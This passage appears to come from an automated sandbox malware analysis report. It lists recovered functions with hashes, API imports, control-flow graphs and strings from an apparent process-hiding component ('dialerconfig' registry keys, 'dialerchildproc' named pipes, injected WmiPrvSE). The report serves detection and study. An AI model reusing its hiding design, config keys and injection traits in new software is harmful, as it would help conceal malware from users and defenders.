                                                        • Instruction Fuzzy Hash: 1A11DB31F0E29E8FE7229B64C8201E97B70EF42751F0645B3D064DB1E2DA783609C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA906A5 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f7781692454fa25b38ff5f85e8884dfcd84dfe6d6a5ecdb39deeb86e179fa61e
                                                        • Instruction ID: 594e7a21e9ad476f9c4d3c1ca5cc41edc949a07883730a193aed2e8cf2d604b1
                                                        • Opcode Fuzzy Hash: f7781692454fa25b38ff5f85e8884dfcd84dfe6d6a5ecdb39deeb86e179fa61e
                                                        • Instruction Fuzzy Hash: 82F03031A0964E9FEB60EF98D8596EDB7E1FF54300F110437E90CC21A0DBB462A48B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA91360 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 998eb7bb752996239fed5c967584f0827bdcc866618ea077d11860721a7acb96
                                                        • Instruction ID: 3b3c5d9ce807fc00c1717934460f2f686ceb0d6a79bc7fce525ccdcf1dd04652
                                                        • Opcode Fuzzy Hash: 998eb7bb752996239fed5c967584f0827bdcc866618ea077d11860721a7acb96
                                                        • Instruction Fuzzy Hash: 0EF0BD3091494D9FDF94EF58C448AAA7BE0FF28304F01456AF818D3260D630E594CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA906C8 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4ae1aef31b9b6cc8379d358deaf00049ef9a414c64ef64c224a68b8697a2af3
                                                        • Instruction ID: d2757681098fb3b3d70d8dac65e63d124bc0106d0d8cc4016c8d2a3917b483f0
                                                        • Opcode Fuzzy Hash: e4ae1aef31b9b6cc8379d358deaf00049ef9a414c64ef64c224a68b8697a2af3
                                                        • Instruction Fuzzy Hash: EAF0123091564D9FEB90EFA4C9496EE7BE1FF54304F014466E81CD2160DB70A6A4CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA92696 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3388c7e528237f0736662ab1296a48a7b2067dc720f78fff7d1b96c4dc7465eb
                                                        • Instruction ID: c69756b6fa9998b7396033a2a0895cbe33fd7812ae86667b2e8893eb20fe2442
                                                        • Opcode Fuzzy Hash: 3388c7e528237f0736662ab1296a48a7b2067dc720f78fff7d1b96c4dc7465eb
                                                        • Instruction Fuzzy Hash: 1DF05831F1D51A4BE7B8DB28C8A82B866B1EF85304F0101F6E10DE61E5CE742E829F40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00007FFD9BC493F1 Relevance: .1, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e885fb1de6b33c8836a5cf327a6586278a6dc8325f5f06cc0bad73f1b52aaf2
                                                        • Instruction ID: 2fb693fa3f977521cf3d4682d4f7e72b55d37f83b51f72f2975c0f80fa638129
                                                        • Opcode Fuzzy Hash: 7e885fb1de6b33c8836a5cf327a6586278a6dc8325f5f06cc0bad73f1b52aaf2
                                                        • Instruction Fuzzy Hash: 2541ACA244E7C18FD7038B749C766913FB0AE23255B1F89DBC4C0CF1A3E1195A5AE762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BC4D87D Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14050e578a367922eba2cb4a074c2f48ad8fd21e306ac395bf78f67e3987926d
                                                        • Instruction ID: dd10d7fc88bfb0f3bd90b977b8428cfc8485502a75ac4a6dd3abf0064f00d5dc
                                                        • Opcode Fuzzy Hash: 14050e578a367922eba2cb4a074c2f48ad8fd21e306ac395bf78f67e3987926d
                                                        • Instruction Fuzzy Hash: 5C31E870E18A5D8FCF88EF98D451AEDBBF1FB69300F20516AD419E7291CB35AA41CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FFD9BA909B0 Relevance: 5.2, Strings: 4, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: c9$!k9$"s9$#{9
                                                        • API String ID: 0-1692736845
                                                        • Opcode ID: 2af611734ed15c9b9afcbd2e114b3668db27928fea059129e65cd52b36b734c3
                                                        • Instruction ID: a48a9aa598d4cf26993ff4af75965005228ce64cb117de4c073b3d04e59b5b01
                                                        • Opcode Fuzzy Hash: 2af611734ed15c9b9afcbd2e114b3668db27928fea059129e65cd52b36b734c3
                                                        • Instruction Fuzzy Hash: B1519E17B0D06659E239B2FD78618ED5B488FA827FB0847B7F46D8D0D78D086085C2E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 00000216D26F328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 06e87f6da14ffa3972b917f376902c18445c70b0b36387eb4cf7f7bd653b36b6
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 02118032B107E083FF70EB22F95D7EF22A4BBB4B45F50516D9A4681595EF78C0A88250
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000216D26F1628: GetProcessHeap.KERNEL32 ref: 00000216D26F1633
                                                          • Part of subcall function 00000216D26F1628: HeapAlloc.KERNEL32 ref: 00000216D26F1642
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F16B2
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F16DF
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F16F9
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1719
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F1734
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1754
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F176F
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F178F
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F17AA
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F17CA
                                                        • Sleep.KERNEL32 ref: 00000216D26F1AD7
                                                        • SleepEx.KERNEL32 ref: 00000216D26F1ADD
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F17E5
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1805
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F1820
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F1840
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F185B
                                                          • Part of subcall function 00000216D26F1628: RegOpenKeyExW.ADVAPI32 ref: 00000216D26F187B
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F1896
                                                          • Part of subcall function 00000216D26F1628: RegCloseKey.ADVAPI32 ref: 00000216D26F18A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 3b3ec43b34bc7c74e54b928c79361c24c7783f5ea0374df26fa6b5afc27bf782
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: A931B8713117A183FF509B2AFA6D2EF23B5ABF4BC0F4454699E0987699FE24C891C210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 216d26f3844-216d26f384f 58 216d26f3851-216d26f3864 StrCmpNIW 57->58 59 216d26f3869-216d26f3870 57->59 58->59 60 216d26f3866 58->60 60->59
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 6d50af5e443f0b5a1b10834cd7f43757556e4f3daefa92c80cf3a1e09134f5da
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: E7D0A7703213C6CBFF24DFA7E8CD6F96360EB28B44F884028D91001150DB5D8D9D9710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26C273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367207217.00000216D26C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216D26C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26c0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 4d6850e5edaad7af1019651b05116c1117eacf110da8bbe6186f6baef486b0f9
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 5461E272B017E087DF68AF16A0487AD7B92F764FA4F5C8129DE5907788DA38D852E700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00000216D26F2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 367 216d26f2b2c-216d26f2ba5 call 216d2712ce0 370 216d26f2ee0-216d26f2f03 367->370 371 216d26f2bab-216d26f2bb1 367->371 371->370 372 216d26f2bb7-216d26f2bba 371->372 372->370 373 216d26f2bc0-216d26f2bc3 372->373 373->370 374 216d26f2bc9-216d26f2bd9 GetModuleHandleA 373->374 375 216d26f2bed 374->375 376 216d26f2bdb-216d26f2beb call 216d2706090 374->376 378 216d26f2bf0-216d26f2c0e 375->378 376->378 378->370 381 216d26f2c14-216d26f2c33 StrCmpNIW 378->381 381->370 382 216d26f2c39-216d26f2c3d 381->382 382->370 383 216d26f2c43-216d26f2c4d 382->383 383->370 384 216d26f2c53-216d26f2c5a 383->384 384->370 385 216d26f2c60-216d26f2c73 384->385 386 216d26f2c75-216d26f2c81 385->386 387 216d26f2c83 385->387 388 216d26f2c86-216d26f2c8a 386->388 387->388 389 216d26f2c8c-216d26f2c98 388->389 390 216d26f2c9a 388->390 391 216d26f2c9d-216d26f2ca7 389->391 390->391 392 216d26f2d9d-216d26f2da1 391->392 393 216d26f2cad-216d26f2cb0 391->393 394 216d26f2ed2-216d26f2eda 392->394 395 216d26f2da7-216d26f2daa 392->395 396 216d26f2cc2-216d26f2ccc 393->396 397 216d26f2cb2-216d26f2cbf call 216d26f199c 393->397 394->370 394->385 398 216d26f2dac-216d26f2db8 call 216d26f199c 395->398 399 216d26f2dbb-216d26f2dc5 395->399 401 216d26f2d00-216d26f2d0a 396->401 402 216d26f2cce-216d26f2cdb 396->402 397->396 398->399 406 216d26f2df5-216d26f2df8 399->406 407 216d26f2dc7-216d26f2dd4 399->407 403 216d26f2d0c-216d26f2d19 401->403 404 216d26f2d3a-216d26f2d3d 401->404 402->401 409 216d26f2cdd-216d26f2cea 402->409 403->404 411 216d26f2d1b-216d26f2d28 403->411 412 216d26f2d3f-216d26f2d49 call 216d26f1bbc 404->412 413 216d26f2d4b-216d26f2d58 lstrlenW 404->413 416 216d26f2e05-216d26f2e12 lstrlenW 406->416 417 216d26f2dfa-216d26f2e03 call 216d26f1bbc 406->417 407->406 415 216d26f2dd6-216d26f2de3 407->415 410 216d26f2ced-216d26f2cf3 409->410 419 216d26f2d93-216d26f2d98 410->419 420 216d26f2cf9-216d26f2cfe 410->420 423 216d26f2d2b-216d26f2d31 411->423 412->413 412->419 425 216d26f2d7b-216d26f2d8d call 216d26f3844 413->425 426 216d26f2d5a-216d26f2d64 413->426 427 216d26f2de6-216d26f2dec 415->427 421 216d26f2e35-216d26f2e3f call 216d26f3844 416->421 422 216d26f2e14-216d26f2e1e 416->422 417->416 437 216d26f2e4a-216d26f2e55 417->437 430 216d26f2e42-216d26f2e44 419->430 420->401 420->410 421->430 422->421 431 216d26f2e20-216d26f2e33 call 216d26f152c 422->431 423->419 432 216d26f2d33-216d26f2d38 423->432 425->419 425->430 426->425 435 216d26f2d66-216d26f2d79 call 216d26f152c 426->435 436 216d26f2dee-216d26f2df3 427->436 427->437 430->394 430->437 431->421 431->437 432->404 432->423 435->419 435->425 436->406 436->427 441 216d26f2ecc-216d26f2ed0 437->441 442 216d26f2e57-216d26f2e5b 437->442 441->394 445 216d26f2e63-216d26f2e7d call 216d26f85c0 442->445 446 216d26f2e5d-216d26f2e61 442->446 448 216d26f2e80-216d26f2e83 445->448 446->445 446->448 451 216d26f2e85-216d26f2ea3 call 216d26f85c0 448->451 452 216d26f2ea6-216d26f2ea9 448->452 451->452 452->441 454 216d26f2eab-216d26f2ec9 call 216d26f85c0 452->454 454->441
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 08a8d0198ac4937a3c62658ab8e4bd3f61832f40d1c6f621bdb0b40b061259f3
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 5EB17F72311BA087EFA58F25E85C7EE63A5FB64B84F54501AEE0957798EB35CC40CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: c03fe58164123225f9af638b85600b70d16c18d65751f0822510b86061e0e248
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: ED313C72305B808AEB609F61F8987EE7374F798744F44442ADA4E57B98EF38C648C710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 84dda6b063edcf1b436ff4901af77c301f9731e3b1a9d8c16d87d96385fdbb1d
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 79317C32314B8086EB60CF25F8983EE73A0F799754F51012AEA9D43B98EF39C159CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 47cd65222b6dfd8ee39d338ffd709708c537ad1a16816e85f25416f146059c2a
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 0D710B36310B5086EB20AF66F99DAED23B4F7A4B88F015119DE4E97B69DF39C448C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 96c997046e1355441d4318b30f8826780c6a3a7a860843d4009e498c9daeb0be
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: DF513776700B8486EB64CF62F55D3AEB7B1F799BD9F058128DA4A07718DF39C4498B00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000216D26FCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCEBC
                                                        • SetLastError.KERNEL32 ref: 00000216D26FCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000216D26FECCC,?,?,?,?,00000216D26FBF9F,?,?,?,?,?,00000216D26F7AB0), ref: 00000216D26FCF2C
                                                          • Part of subcall function 00000216D26FD6CC: HeapAlloc.KERNEL32 ref: 00000216D26FD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF54
                                                          • Part of subcall function 00000216D26FD744: HeapFree.KERNEL32 ref: 00000216D26FD75A
                                                          • Part of subcall function 00000216D26FD744: GetLastError.KERNEL32 ref: 00000216D26FD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216D2700A6B,?,?,?,00000216D270045C,?,?,?,00000216D26FC84F), ref: 00000216D26FCF76
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: d11699a7f6e17cf0efe9ece0774751f9ea38668c029b1f9cb3cde6bd6a240e56
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 6541A2307013E443FE79E735B56D3FF62926FB57B0F25172CA9364A6EAEE2894418210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 490bfccdf753e2bc7508e4e01608ad746833ba0924d2233be78864ab671b7703
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 39216A32714B5083EB208B25F55C7AE63B1F7A9BA4F504219EA5902AA8DF7DC189CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 92ddf48e1aa4a1190580f65684b299f7d0a26a8f15121ea85989b59e145c7e08
